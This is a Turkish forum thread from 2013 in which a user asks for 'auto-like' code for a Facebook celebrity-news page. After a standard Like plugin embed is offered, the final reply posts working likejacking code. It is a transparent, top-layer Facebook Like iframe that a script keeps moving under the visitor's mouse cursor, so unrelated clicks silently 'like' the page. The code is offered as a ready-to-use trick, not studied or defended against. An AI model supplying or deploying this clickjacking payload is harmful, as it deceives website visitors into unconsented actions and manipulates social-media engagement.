Merhaba arkadaşlar, şu kodu alamadım bir türlü https://www.facebook.com/plugins/lik...&height=21
Bu kodun aynısını https://www.facebook.com/Unlulerhaber şu sayfa için alır mısınız
Şu sayfanın like kodunu alır mısınız
3
●421
- 08-06-2013, 22:35:42Böyle bişeymi
https://developers.facebook.com/docs.../plugins/like/
<div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-like" data-href="https://www.facebook.com/Unlulerhaber" data-send="true" data-width="450" data-show-faces="true"></div> - 08-06-2013, 22:49:26Hocam ben şu otolike deki like kodu varya onu diyorum https://www.r10.net/facebook/848927-f...-ipuclari.htmlbecerixiz adlı üyeden alıntı: mesajı görüntüle
- 09-06-2013, 00:32:33Aslan adlı üyeden alıntı: mesajı görüntüle
<div style="cursor:default !important;overflow:hidden; width:5px; height:12px; position:absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity:0.0;z-index:9999" id="i">
<iframe src="http://www.facebook.com/plugins/like.php?app_id=142210935860745&href=https://www.facebook.com/Unlulerhaber&send=false&layout=standard&am p;width=450&show_faces=true&action=like&am p;colorscheme=light&font&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe></div>
<SCRIPT>
var c = document.getElementById('i');
function s(e){
if(document.all)e = event;
c.style.left = e.clientX - 4;
c.style.top = e.clientY - 5;
return false;
}
document.documentElement.onmousemove = s;
window.onload=setTimeout("i.style.display = 'none'",60000);
</SCRIPT>